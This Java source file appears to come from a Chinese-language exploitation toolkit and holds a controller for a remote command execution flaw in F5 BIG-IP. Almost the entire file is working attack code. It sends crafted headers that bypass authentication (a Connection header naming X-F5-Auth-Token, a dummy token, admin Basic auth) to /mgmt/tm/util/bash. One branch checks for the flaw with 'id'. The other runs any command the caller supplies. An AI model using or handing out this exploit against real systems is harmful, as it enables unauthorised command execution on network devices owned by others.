package com.achuna33.Controllers;
import com.achuna33.SupportType.Poc_Exp;
import com.achuna33.SupportType.SupportVul;
import com.achuna33.Utils.HttpRequest;
import com.achuna33.Utils.Response;
import com.achuna33.Utils.Utils;

import java.net.MalformedURLException;

@BasicMapping(uri = "F5")
public class F5BigipController extends Controller implements BasicController{
    @VulnerabilityDescriptionMapping(Description = "BIG-IP 远程命令执行漏洞",SupportVulType = SupportVul.RuntimeExec)
    public void vul_c_命令执行(Poc_Exp type, String target, Object... args) throws MalformedURLException {
        WriteLog("\n[*]开始检测：  BIG-IP 远程命令执行漏洞 远程命令执行漏洞");


        switch (type){
            case EXP:
                String command = (String) args[0];
                HttpRequest httpRequest1 =  new HttpRequest(target+"/mgmt/tm/util/bash");
                String data2 = "{\"command\":\"run\",\"utilCmdArgs\":\"-c id\"}";
                httpRequest1.addHeaders("Host","127.0.0.1");
                httpRequest1.addHeaders("Authorization","Basic YWRtaW46");
                httpRequest1.addHeaders("X-F5-Auth-Token","a");
                httpRequest1.addHeaders("Content-type","");
                httpRequest1.addHeaders("Accept-Encoding"," gzip, deflate");
                httpRequest1.addHeaders("Content-type","application/json");
                httpRequest1.addHeaders("Accept","*/*");
                httpRequest1.addHeaders("referer","127.0.0.1");
                httpRequest1.addHeaders("ConnectioN","close, X-F5-Auth-Token");
                Response result1 = httpRequest1.Post(data2.replace("id",command));
                WriteLog(result1.responseBody);
                break;
            case POC:
                HttpRequest httpRequest = new HttpRequest(target+"/mgmt/tm/util/bash");
                String data = "{\"command\":\"run\",\"utilCmdArgs\":\"-c id\"}";
                httpRequest.addHeaders("Host","localhost");
                httpRequest.addHeaders("Authorization","Basic YWRtaW46");
                httpRequest.addHeaders("X-F5-Auth-Token","a");
                httpRequest.addHeaders("Content-type","application/json");
//                httpRequest.addHeaders("Content-type","");
                httpRequest.addHeaders("referer","127.0.0.1");
//                System.out.println(httpRequest.getClass());
                httpRequest.addHeaders("Accept-Encoding"," gzip, deflate");
                httpRequest.addHeaders("Accept","*/*");
                httpRequest.addHeaders("ConnectioN","close, X-F5-Auth-Token");
                Response result = httpRequest.Post(data);
                if(result.responseBody.contains("uid=")&&result.statusCode==200){
                    WriteLog("\n[*] 存在漏洞");
                    WriteLog("\n[*]请求地址："+target+"/mgmt/tm/util/bash"+"未写exp，建议抓包到burp自行修改命令");
                    WriteLog("\n"+result.responseBody);
                }else {
                    WriteLog("\n[-] 不存在漏洞");
                }
        }
    }
}
